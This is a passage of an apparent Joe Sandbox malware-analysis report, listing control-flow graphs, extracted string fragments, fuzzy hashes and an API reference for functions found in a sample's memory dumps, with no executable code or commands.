                                            control_flow_graph 1289 9941cd0-9941cf8 1290 9941cfe-9941d03 1289->1290 1291 99421db-9942244 1289->1291 1290->1291 1292 9941d09-9941d26 1290->1292 1299 994224b-99422d3 1291->1299 1298 9941d2c-9941d30 1292->1298 1292->1299 1300 9941d32-9941d3c 1298->1300 1301 9941d3f-9941d43 1298->1301 1335 99422de-994235e 1299->1335 1300->1301 1304 9941d45-9941d4f 1301->1304 1305 9941d52-9941d59 1301->1305 1304->1305 1306 9941e74-9941e79 1305->1306 1307 9941d5f-9941d8f 1305->1307 1311 9941e81-9941e86 1306->1311 1312 9941e7b-9941e7f 1306->1312 1318 994255e-9942575 1307->1318 1319 9941d95-9941e68 1307->1319 1314 9941e98-9941ec8 1311->1314 1312->1311 1316 9941e88-9941e8c 1312->1316 1314->1335 1336 9941ece-9941ed1 1314->1336 1317 9941e92-9941e95 1316->1317 1316->1318 1317->1314 1327 99425c4-9942609 1318->1327 1328 9942577-99425c3 1318->1328 1319->1306 1349 9941e6a 1319->1349 1338 9942612-994264c 1327->1338 1339 994260b-9942611 1327->1339 1328->1327 1356 9942365-99423e7 1335->1356 1336->1335 1341 9941ed7-9941ed9 1336->1341 1339->1338 1341->1335 1343 9941edf-9941f14 1341->1343 1343->1356 1357 9941f1a-9941f23 1343->1357 1349->1306 1363 99423ef-9942471 1356->1363 1358 9942086-994208a 1357->1358 1359 9941f29-9941f83 1357->1359 1362 9942090-9942094 1358->1362 1358->1363 1401 9941f95 1359->1401 1402 9941f85-9941f8e 1359->1402 1364 9942479-99424a6 1362->1364 1365 994209a-99420a0 1362->1365 1363->1364 1378 99424ad-994252d 1364->1378 1368 99420a4-99420d9 1365->1368 1369 99420a2 1365->1369 1373 99420e0-99420e6 1368->1373 1369->1373 1377 99420ec-99420f4 1373->1377 1373->1378 1384 99420f6-99420fa 1377->1384 1385 99420fb-99420fd 1377->1385 1435 9942534-9942556 1378->1435 1384->1385 1386 994215f-9942165 1385->1386 1387 99420ff-9942123 1385->1387 1395 9942184-99421b2 1386->1395 1396 9942167-9942182 1386->1396 1420 9942125-994212a 1387->1420 1421 994212c-9942130 1387->1421 1416 99421ba-99421c6 1395->1416 1396->1416 1407 9941f99-9941f9b 1401->1407 1406 9941f90-9941f93 1402->1406 1402->1407 1406->1407 1414 9941fa2-9941fa6 1407->1414 1415 9941f9d 1407->1415 1417 9941fb4-9941fba 1414->1417 1418 9941fa8-9941faf 1414->1418 1415->1414 1416->1435 1436 99421cc-99421d8 1416->1436 1423 9941fc4-9941fc9 1417->1423 1424 9941fbc-9941fc2 1417->1424 1422 9942051-9942055 1418->1422 1426 994213c-994214f call 99426e0 1420->1426 1421->1318 1427 9942136-9942139 1421->1427 1433 9942074-9942080 1422->1433 1434 9942057-9942071 1422->1434 1431 9941fcf-9941fd5 1423->1431 1424->1431 1443 9942155-994215d 1426->1443 1427->1426 1439 9941fd7-9941fd9 1431->1439 1440 9941fdb-9941fe0 1431->1440 1433->1358 1433->1359 1434->1433 1435->1318 1445 9941fe2-9941ff4 1439->1445 1440->1445 1443->1416 1451 9941ff6-9941ffc 1445->1451 1452 9941ffe-9942003 1445->1452 1453 9942009-9942010 1451->1453 1452->1453 1455 9942016 1453->1455 1456 9942012-9942014 1453->1456 1461 994201b-9942026 1455->1461 1456->1461 1462 9942028-994202b 1461->1462 1463 994204a 1461->1463 1462->1422 1465 994202d-9942033 1462->1465 1463->1422 1466 9942035-9942038 1465->1466 1467 994203a-9942043 1465->1467 1466->1463 1466->1467 1467->1422 1469 9942045-9942048 1467->1469 1469->1422 1469->1463
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191264997.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9940000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hgq$Hgq$Hgq$Hgq$Hgq$lqM
                                            • API String ID: 0-959112734
                                            • Opcode ID: 4218517390a48f5c52e0d0197d0675c4f0d2babff357dafd6542318d3203c1d6
                                            • Instruction ID: 62a7bff2dfdef21c23df0b3cb90b82504e58f42b94842210588104ab622f8164
                                            • Opcode Fuzzy Hash: 4218517390a48f5c52e0d0197d0675c4f0d2babff357dafd6542318d3203c1d6
                                            • Instruction Fuzzy Hash: 06425D70E002188FDB55DFA9C850BAEBBF6BF88300F14856AE449AB395DB349D85CF51
                                            Function 028E8379 Relevance: 7.7, Strings: 6, Instructions: 179COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1567 28e8379-28e83a2 1569 28e83a9-28e83ce 1567->1569 1570 28e83a4 1567->1570 1572 28e83d1 1569->1572 1570->1569 1573 28e83d8-28e83f4 1572->1573 1574 28e83fd-28e83fe 1573->1574 1575 28e83f6 1573->1575 1581 28e85d2-28e8620 1574->1581 1575->1572 1575->1574 1576 28e846c-28e847c call 28e0754 1575->1576 1577 28e856b-28e856f 1575->1577 1578 28e8549-28e8566 1575->1578 1579 28e85b6 1575->1579 1580 28e85a2-28e85b1 1575->1580 1575->1581 1582 28e8403-28e840e 1575->1582 1583 28e84e0-28e8516 1575->1583 1595 28e8483-28e84ad 1576->1595 1584 28e8582-28e8589 1577->1584 1585 28e8571-28e8580 1577->1585 1578->1573 1616 28e85b6 call 28e98cf 1579->1616 1617 28e85b6 call 28e9908 1579->1617 1580->1573 1615 28e8627-28e862d 1581->1615 1589 28e8419-28e8439 1582->1589 1603 28e8518-28e8527 1583->1603 1604 28e8529-28e8530 1583->1604 1590 28e8590-28e859d 1584->1590 1585->1590 1605 28e844c-28e8453 1589->1605 1606 28e843b-28e844a 1589->1606 1590->1573 1594 28e85bc-28e85cd 1594->1573 1611 28e84af-28e84be 1595->1611 1612 28e84c0-28e84c7 1595->1612 1607 28e8537-28e8544 1603->1607 1604->1607 1610 28e845a-28e8467 1605->1610 1606->1610 1607->1573 1610->1573 1613 28e84ce-28e84db 1611->1613 1612->1613 1613->1573 1616->1594 1617->1594
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,GH_$,GH_$4_$4_$pn$n
                                            • API String ID: 0-3969063491
                                            • Opcode ID: 133a47d33855acdd55a8b0c82ae808bc118239864d88b13bbf24171fbae77619
                                            • Instruction ID: b05c2787408023d7dec5fbbc001f6aa56f8711750422f56e5f7fe51727170c7b
                                            • Opcode Fuzzy Hash: 133a47d33855acdd55a8b0c82ae808bc118239864d88b13bbf24171fbae77619
                                            • Instruction Fuzzy Hash: A081F4B8E00209DFDB44CFA5D58459EBBB2BF89304F20986AD41ABB2A4DB355941CF51
                                            Function 0A0A9180 Relevance: 7.0, Strings: 5, Instructions: 721COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$(ocq$,gq$,gq$Hgq
                                            • API String ID: 0-1029698136
                                            • Opcode ID: d10adeaf68f056888c3b05042fd48028fdc3d3f96b99c6930f2a582e185730ee
                                            • Instruction ID: 406cc9c86c1421cad20292a9e11496fb65d99b451d65b37b51be18462a439b05
                                            • Opcode Fuzzy Hash: d10adeaf68f056888c3b05042fd48028fdc3d3f96b99c6930f2a582e185730ee
                                            • Instruction Fuzzy Hash: 0A526E35B101199FCB58DFA9C484AAEBBF2FF98350F158169E8069B361DB35EC41CB90
                                            Function 0998C390 Relevance: 4.1, Strings: 3, Instructions: 396COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1964 998c390-998c3b2 1965 998c3b8-998c3f3 call 99840dc call 99840ec call 998bf7c 1964->1965 1966 998c762-998c767 1964->1966 1978 998c3f5-998c3ff 1965->1978 1979 998c406-998c426 1965->1979 1967 998c769-998c76b 1966->1967 1968 998c771-998c774 1966->1968 1967->1968 1971 998c77c-998c784 1968->1971 1973 998c78a-998c791 1971->1973 1978->1979 1981 998c428-998c432 1979->1981 1982 998c439-998c459 1979->1982 1981->1982 1984 998c45b-998c465 1982->1984 1985 998c46c-998c48c 1982->1985 1984->1985 1987 998c48e-998c498 1985->1987 1988 998c49f-998c4a8 call 998bf8c 1985->1988 1987->1988 1991 998c4aa-998c4c5 call 998bf8c 1988->1991 1992 998c4cc-998c4d5 call 998bf9c 1988->1992 1991->1992 1997 998c4f9-998c502 call 998bfac 1992->1997 1998 998c4d7-998c4f2 call 998bf9c 1992->1998 2004 998c50d-998c529 1997->2004 2005 998c504-998c508 call 998bfbc 1997->2005 1998->1997 2009 998c52b-998c531 2004->2009 2010 998c541-998c545 2004->2010 2005->2004 2011 998c533 2009->2011 2012 998c535-998c537 2009->2012 2013 998c55f-998c5a7 2010->2013 2014 998c547-998c558 call 998bfcc 2010->2014 2011->2010 2012->2010 2020 998c5a9 2013->2020 2021 998c5cb-998c5d2 2013->2021 2014->2013 2022 998c5ac-998c5b2 2020->2022 2023 998c5e9-998c5f7 call 998bfdc 2021->2023 2024 998c5d4-998c5e3 2021->2024 2025 998c5b8-998c5be 2022->2025 2026 998c792-998c7d1 2022->2026 2033 998c5f9-998c5fb 2023->2033 2034 998c601-998c62b 2023->2034 2024->2023 2028 998c5c8-998c5c9 2025->2028 2029 998c5c0-998c5c2 2025->2029 2036 998c830-998c840 2026->2036 2037 998c7d3-998c7f4 2026->2037 2028->2021 2028->2022 2029->2028 2033->2034 2042 998c658-998c674 2034->2042 2043 998c62d-998c63b 2034->2043 2044 998ca16-998ca1d 2036->2044 2045 998c846-998c850 2036->2045 2037->2036 2046 998c7f6-998c7fc 2037->2046 2062 998c676-998c680 2042->2062 2063 998c687-998c6ae call 998bfec 2042->2063 2043->2042 2061 998c63d-998c651 2043->2061 2047 998ca2c-998ca3f 2044->2047 2048 998ca1f-998ca27 call 9983f58 2044->2048 2049 998c85a-998c864 2045->2049 2050 998c852-998c859 2045->2050 2051 998c80a-998c80f 2046->2051 2052 998c7fe-998c800 2046->2052 2048->2047 2059 998ca49-998cad4 2049->2059 2060 998c86a-998c8aa 2049->2060 2053 998c81c-998c829 2051->2053 2054 998c811-998c815 2051->2054 2052->2051 2053->2036 2054->2053 2113 998cadb-998caf0 2059->2113 2114 998cad6 call 998c110 2059->2114 2082 998c8ac-998c8b2 2060->2082 2083 998c8c2-998c8c6 2060->2083 2061->2042 2062->2063 2072 998c6b0-998c6b6 2063->2072 2073 998c6c6-998c6ca 2063->2073 2076 998c6b8 2072->2076 2077 998c6ba-998c6bc 2072->2077 2078 998c6cc-998c6de 2073->2078 2079 998c6e5-998c701 2073->2079 2076->2073 2077->2073 2078->2079 2090 998c719-998c71d 2079->2090 2091 998c703-998c709 2079->2091 2086 998c8b4 2082->2086 2087 998c8b6-998c8b8 2082->2087 2088 998c8c8-998c8ed 2083->2088 2089 998c8f3-998c90b call 998c100 2083->2089 2086->2083 2087->2083 2088->2089 2106 998c918-998c920 2089->2106 2107 998c90d-998c912 2089->2107 2090->1973 2096 998c71f-998c72d 2090->2096 2093 998c70b 2091->2093 2094 998c70d-998c70f 2091->2094 2093->2090 2094->2090 2104 998c73f-998c743 2096->2104 2105 998c72f-998c73d 2096->2105 2112 998c749-998c761 2104->2112 2105->2104 2105->2112 2110 998c922-998c930 2106->2110 2111 998c936-998c955 2106->2111 2107->2106 2110->2111 2119 998c96d-998c971 2111->2119 2120 998c957-998c95d 2111->2120 2125 998caf1 2113->2125 2114->2113 2123 998c9ca-998ca13 2119->2123 2124 998c973-998c980 2119->2124 2121 998c95f 2120->2121 2122 998c961-998c963 2120->2122 2121->2119 2122->2119 2123->2044 2129 998c982-998c9b4 2124->2129 2130 998c9b6-998c9c3 2124->2130 2125->2125 2129->2130 2130->2123
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: plM$|lM$|lM
                                            • API String ID: 0-3351539482
                                            • Opcode ID: 9783646c6d82ebc03c45ffed26b8a168e432a5b7457e31d57fd27cd371be76ab
                                            • Instruction ID: 2cd563be137e8564c10b2932e9d299ff3440d7a1c9504b000768c46c32aa8738
                                            • Opcode Fuzzy Hash: 9783646c6d82ebc03c45ffed26b8a168e432a5b7457e31d57fd27cd371be76ab
                                            • Instruction Fuzzy Hash: CEE18A75B016048FDB15EF69D460BAFB7EAAFC9700F14846DE1859B290DB35E801CBA1
                                            Function 028E34ED Relevance: 4.1, Strings: 3, Instructions: 362COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2138 28e34ed-28e3530 2139 28e3566-28e358c 2138->2139 2140 28e3532-28e3565 2138->2140 2141 28e358e-28e35ba 2139->2141 2142 28e35bc-28e35cd 2139->2142 2140->2139 2141->2142 2143 28e35cf 2142->2143 2144 28e35d4-28e35f1 2142->2144 2143->2144 2146 28e35f9 2144->2146 2147 28e3600-28e361c 2146->2147 2148 28e361e 2147->2148 2149 28e3625-28e3626 2147->2149 2148->2146 2150 28e388d-28e3891 2148->2150 2151 28e36cd-28e36eb 2148->2151 2152 28e3808-28e3811 2148->2152 2153 28e39c0-28e39c6 2148->2153 2154 28e369f-28e36b1 2148->2154 2155 28e395a-28e396f 2148->2155 2156 28e3857-28e386f 2148->2156 2157 28e3715-28e3735 2148->2157 2158 28e3652-28e3669 2148->2158 2159 28e3751-28e375d 2148->2159 2160 28e37ec-28e3803 2148->2160 2161 28e392a-28e392e 2148->2161 2162 28e366b-28e3677 2148->2162 2163 28e362b-28e3637 2148->2163 2164 28e39a4-28e39bb 2148->2164 2165 28e39e5-28e39f2 2148->2165 2166 28e377e-28e378a 2148->2166 2167 28e38bd-28e38c9 2148->2167 2168 28e383d-28e3852 2148->2168 2169 28e373a-28e374c 2148->2169 2170 28e36b6-28e36c8 2148->2170 2171 28e39f7-28e39fe 2148->2171 2172 28e3974-28e3978 2148->2172 2173 28e38f4-28e390d call 28e3c0a 2148->2173 2174 28e36f0-28e3710 2148->2174 2149->2163 2149->2171 2179 28e38a4-28e38ab 2150->2179 2180 28e3893-28e38a2 2150->2180 2151->2147 2175 28e3824-28e382b 2152->2175 2176 28e3813-28e3822 2152->2176 2200 28e39ce-28e39e0 2153->2200 2154->2147 2155->2147 2177 28e3876-28e3888 2156->2177 2178 28e3871 2156->2178 2157->2147 2158->2147 2191 28e375f 2159->2191 2192 28e3764-28e3779 2159->2192 2160->2147 2185 28e3930-28e393f 2161->2185 2186 28e3941-28e3948 2161->2186 2187 28e367e-28e369a 2162->2187 2188 28e3679 2162->2188 2183 28e363e-28e3650 2163->2183 2184 28e3639 2163->2184 2164->2147 2165->2147 2193 28e378c 2166->2193 2194 28e3791-28e37a7 2166->2194 2181 28e38cb 2167->2181 2182 28e38d0-28e38ef 2167->2182 2168->2147 2169->2147 2170->2147 2189 28e397a-28e3989 2172->2189 2190 28e398b-28e3992 2172->2190 2199 28e3913-28e3925 2173->2199 2174->2147 2196 28e3832-28e3838 2175->2196 2176->2196 2177->2147 2178->2177 2198 28e38b2-28e38b8 2179->2198 2180->2198 2181->2182 2182->2147 2183->2147 2184->2183 2195 28e394f-28e3955 2185->2195 2186->2195 2187->2147 2188->2187 2197 28e3999-28e399f 2189->2197 2190->2197 2191->2192 2192->2147 2193->2194 2210 28e37ae-28e37c4 2194->2210 2211 28e37a9 2194->2211 2195->2147 2196->2147 2197->2147 2198->2147 2199->2147 2200->2147 2213 28e37cb-28e37e7 2210->2213 2214 28e37c6 2210->2214 2211->2210 2213->2147 2214->2213
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -2>$;U9o$U[\
                                            • API String ID: 0-2120899229
                                            • Opcode ID: c66da377135ddb586a5ff25e354c51c488d2ed680c49b507b90bce8e4a6f8d10
                                            • Instruction ID: 82f912111f29be7fd391ce72bdef8cbc7e892463a76021fc1fc165ecdd8647bc
                                            • Opcode Fuzzy Hash: c66da377135ddb586a5ff25e354c51c488d2ed680c49b507b90bce8e4a6f8d10
                                            • Instruction Fuzzy Hash: 58F15CB8D0560ACFCF14CFA9C4818AEFBB2FF8A304B149599C456AB365D7359942CF90
                                            Function 028E35A8 Relevance: 4.1, Strings: 3, Instructions: 308COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2217 28e35a8-28e35cd 2219 28e35cf 2217->2219 2220 28e35d4-28e35f1 2217->2220 2219->2220 2221 28e35f9 2220->2221 2222 28e3600-28e361c 2221->2222 2223 28e361e 2222->2223 2224 28e3625-28e3626 2222->2224 2223->2221 2225 28e388d-28e3891 2223->2225 2226 28e36cd-28e36eb 2223->2226 2227 28e3808-28e3811 2223->2227 2228 28e39c0-28e39c6 2223->2228 2229 28e369f-28e36b1 2223->2229 2230 28e395a-28e396f 2223->2230 2231 28e3857-28e386f 2223->2231 2232 28e3715-28e3735 2223->2232 2233 28e3652-28e3669 2223->2233 2234 28e3751-28e375d 2223->2234 2235 28e37ec-28e3803 2223->2235 2236 28e392a-28e392e 2223->2236 2237 28e366b-28e3677 2223->2237 2238 28e362b-28e3637 2223->2238 2239 28e39a4-28e39bb 2223->2239 2240 28e39e5-28e39f2 2223->2240 2241 28e377e-28e378a 2223->2241 2242 28e38bd-28e38c9 2223->2242 2243 28e383d-28e3852 2223->2243 2244 28e373a-28e374c 2223->2244 2245 28e36b6-28e36c8 2223->2245 2246 28e39f7-28e39fe 2223->2246 2247 28e3974-28e3978 2223->2247 2248 28e38f4-28e390d call 28e3c0a 2223->2248 2249 28e36f0-28e3710 2223->2249 2224->2238 2224->2246 2254 28e38a4-28e38ab 2225->2254 2255 28e3893-28e38a2 2225->2255 2226->2222 2250 28e3824-28e382b 2227->2250 2251 28e3813-28e3822 2227->2251 2275 28e39ce-28e39e0 2228->2275 2229->2222 2230->2222 2252 28e3876-28e3888 2231->2252 2253 28e3871 2231->2253 2232->2222 2233->2222 2266 28e375f 2234->2266 2267 28e3764-28e3779 2234->2267 2235->2222 2260 28e3930-28e393f 2236->2260 2261 28e3941-28e3948 2236->2261 2262 28e367e-28e369a 2237->2262 2263 28e3679 2237->2263 2258 28e363e-28e3650 2238->2258 2259 28e3639 2238->2259 2239->2222 2240->2222 2268 28e378c 2241->2268 2269 28e3791-28e37a7 2241->2269 2256 28e38cb 2242->2256 2257 28e38d0-28e38ef 2242->2257 2243->2222 2244->2222 2245->2222 2264 28e397a-28e3989 2247->2264 2265 28e398b-28e3992 2247->2265 2274 28e3913-28e3925 2248->2274 2249->2222 2271 28e3832-28e3838 2250->2271 2251->2271 2252->2222 2253->2252 2273 28e38b2-28e38b8 2254->2273 2255->2273 2256->2257 2257->2222 2258->2222 2259->2258 2270 28e394f-28e3955 2260->2270 2261->2270 2262->2222 2263->2262 2272 28e3999-28e399f 2264->2272 2265->2272 2266->2267 2267->2222 2268->2269 2285 28e37ae-28e37c4 2269->2285 2286 28e37a9 2269->2286 2270->2222 2271->2222 2272->2222 2273->2222 2274->2222 2275->2222 2288 28e37cb-28e37e7 2285->2288 2289 28e37c6 2285->2289 2286->2285 2288->2222 2289->2288
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -2>$;U9o$U[\
                                            • API String ID: 0-2120899229
                                            • Opcode ID: 112a88ec9529a701b414fcc0f478273a048824bd854978e684c23e0227f8241a
                                            • Instruction ID: 2243c0cbf5229c40cb434b4010209eb9bb347686c0cf86ed26515c90df4eb219
                                            • Opcode Fuzzy Hash: 112a88ec9529a701b414fcc0f478273a048824bd854978e684c23e0227f8241a
                                            • Instruction Fuzzy Hash: B0D109B8D0520ADFCF04CFA6C5818AEFBB2FF8A304B149595D416AB365D7349942CF94
                                            Function 028E1332 Relevance: 4.0, Strings: 3, Instructions: 244COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2292 28e1332-28e13b4 2293 28e13c8-28e13f3 2292->2293 2294 28e13b6-28e13c7 2292->2294 2296 28e13fa-28e14a0 call 28e00e4 2293->2296 2297 28e13f5 2293->2297 2294->2293 2305 28e14a1 2296->2305 2297->2296 2306 28e14a8-28e14c4 2305->2306 2307 28e14cd-28e14ce 2306->2307 2308 28e14c6 2306->2308 2310 28e15eb-28e165b call 28e00f4 2307->2310 2308->2305 2308->2307 2309 28e154f-28e1564 2308->2309 2308->2310 2311 28e1569-28e1580 2308->2311 2312 28e15c6-28e15ce call 28e1c60 2308->2312 2313 28e1514-28e154a 2308->2313 2314 28e15a5-28e15c1 2308->2314 2315 28e1585-28e15a0 2308->2315 2316 28e14d3-28e14d7 2308->2316 2317 28e1500-28e1512 2308->2317 2309->2306 2330 28e165d call 28e27ef 2310->2330 2331 28e165d call 28e28da 2310->2331 2332 28e165d call 28e280b 2310->2332 2333 28e165d call 28e2698 2310->2333 2334 28e165d call 28e2829 2310->2334 2335 28e165d call 28e3286 2310->2335 2336 28e165d call 28e2784 2310->2336 2337 28e165d call 28e3213 2310->2337 2311->2306 2324 28e15d4-28e15e6 2312->2324 2313->2306 2314->2306 2315->2306 2318 28e14ea-28e14f1 2316->2318 2319 28e14d9-28e14e8 2316->2319 2317->2306 2320 28e14f8-28e14fe 2318->2320 2319->2320 2320->2306 2324->2306 2329 28e1663-28e166d 2330->2329 2331->2329 2332->2329 2333->2329 2334->2329 2335->2329 2336->2329 2337->2329
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Tecq$Tecq$hM
                                            • API String ID: 0-2073652005
                                            • Opcode ID: 665e72ccbd3dd38c91daad98fc6457dc1367bdf2cc6af6f2e30c7c166bd7c364
                                            • Instruction ID: 5f68eaa7967759cc1eb0b8e4c10e293489afe17f2e6a3cbeed46fcd1d3d741ed
                                            • Opcode Fuzzy Hash: 665e72ccbd3dd38c91daad98fc6457dc1367bdf2cc6af6f2e30c7c166bd7c364
                                            • Instruction Fuzzy Hash: BDB15974E046498FDB04CFA9C884ADDFBF2FF8A310F14856AD859AB365E7319941CB50
                                            Function 028E13D0 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2339 28e13d0-28e13f3 2340 28e13fa-28e14a0 call 28e00e4 2339->2340 2341 28e13f5 2339->2341 2349 28e14a1 2340->2349 2341->2340 2350 28e14a8-28e14c4 2349->2350 2351 28e14cd-28e14ce 2350->2351 2352 28e14c6 2350->2352 2354 28e15eb-28e165b call 28e00f4 2351->2354 2352->2349 2352->2351 2353 28e154f-28e1564 2352->2353 2352->2354 2355 28e1569-28e1580 2352->2355 2356 28e15c6-28e15ce call 28e1c60 2352->2356 2357 28e1514-28e154a 2352->2357 2358 28e15a5-28e15c1 2352->2358 2359 28e1585-28e15a0 2352->2359 2360 28e14d3-28e14d7 2352->2360 2361 28e1500-28e1512 2352->2361 2353->2350 2374 28e165d call 28e27ef 2354->2374 2375 28e165d call 28e28da 2354->2375 2376 28e165d call 28e280b 2354->2376 2377 28e165d call 28e2698 2354->2377 2378 28e165d call 28e2829 2354->2378 2379 28e165d call 28e3286 2354->2379 2380 28e165d call 28e2784 2354->2380 2381 28e165d call 28e3213 2354->2381 2355->2350 2368 28e15d4-28e15e6 2356->2368 2357->2350 2358->2350 2359->2350 2362 28e14ea-28e14f1 2360->2362 2363 28e14d9-28e14e8 2360->2363 2361->2350 2364 28e14f8-28e14fe 2362->2364 2363->2364 2364->2350 2368->2350 2373 28e1663-28e166d 2374->2373 2375->2373 2376->2373 2377->2373 2378->2373 2379->2373 2380->2373 2381->2373
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Tecq$Tecq$hM
                                            • API String ID: 0-2073652005
                                            • Opcode ID: ea63495aae160d25e1d145ae1dc3d562bbf3357069d369102d062b99bef65173
                                            • Instruction ID: fe2dca01be1bca2fd51f72d16d313a6d2ee1950762fe21fa111fd181a71ac957
                                            • Opcode Fuzzy Hash: ea63495aae160d25e1d145ae1dc3d562bbf3357069d369102d062b99bef65173
                                            • Instruction Fuzzy Hash: DD81E7B4E002199FCB08CFE9D884A9EFBB2FF89314F10952AD51ABB364D7349945CB54
                                            Function 028E07F4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 028E9C25
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: $H
                                            • API String ID: 1778838933-3639665872
                                            • Opcode ID: 0f39b7184350f4efac7959d12160c73a8390c24355dc9f4a46419b43129798f4
                                            • Instruction ID: 54a113bd809076b1b9c9eccb4dabbcf114b8c4b543db89e61a192af8d552a6de
                                            • Opcode Fuzzy Hash: 0f39b7184350f4efac7959d12160c73a8390c24355dc9f4a46419b43129798f4
                                            • Instruction Fuzzy Hash: 534174B9D04258DFCF10CFA9D980A9EFBF5BB19310F10A02AE819B7210D375A945CF64
                                            Function 028E9B68 Relevance: 1.6, APIs: 1, Instructions: 101nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 028E9C25
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID:
                                            • API String ID: 1778838933-0
                                            • Opcode ID: 7598905bfc53cee44cbc466c2938ebbc0c8a432b4b15a8888d0c2a1891408e53
                                            • Instruction ID: 3b5a529e16b8ea2205b13a68eed89584374766ad0033f0eaf13adcb11540b80e
                                            • Opcode Fuzzy Hash: 7598905bfc53cee44cbc466c2938ebbc0c8a432b4b15a8888d0c2a1891408e53
                                            • Instruction Fuzzy Hash: 194175B9D04258DFCF10CFA9D984ADEFBB5BB19310F14A02AE828B7250D375A945CF64
                                            Function 09941CC0 Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191264997.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9940000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: lqM
                                            • API String ID: 0-965483564
                                            • Opcode ID: 6e88212a0680bac6099c8730c8e6b6d54db9fdf47dc816c9ca2dabea130f4f3d
                                            • Instruction ID: 8a690fefb72c8c07c16f75ce96d84f47a82a5bd5e96584f7f2d3427ffb8993c1
                                            • Opcode Fuzzy Hash: 6e88212a0680bac6099c8730c8e6b6d54db9fdf47dc816c9ca2dabea130f4f3d
                                            • Instruction Fuzzy Hash: 10C16C71E002198FDB25CFA5D880B9DBBF2BF88310F14C5AAE459AB255DB30D985CF50
                                            Function 028EA0B2 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: U't;
                                            • API String ID: 0-449652031
                                            • Opcode ID: 5a5b04db8158a8054dc575b6e755e44d08ea9d0fbbe6f1a8bede28e8916240d7
                                            • Instruction ID: 3abf1126897087c5c09fecef424a341d8d232379715591c6f8dcefd8426a04eb
